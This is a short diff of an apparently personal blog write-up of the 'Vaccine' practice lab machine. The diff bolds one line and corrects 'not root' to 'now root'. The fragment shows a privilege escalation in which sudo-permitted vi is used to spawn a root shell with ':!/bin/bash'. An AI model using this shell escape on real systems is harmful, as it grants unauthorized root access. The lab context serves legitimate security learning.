etcpwd13/greyfriar_blog/_posts/2021-01-01-Notes-Vaccine.md

 postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
 ```

-VI is run as root so if we open this file and then just close it with
+**VI is run as root so if we open this file and then just close it with**

 ```yaml
 :!/bin/bash
 ```

-hit return and it closes and we are not root
+hit return and it closes and we are now root

 ```yaml
 root@vaccine:/home# cd /root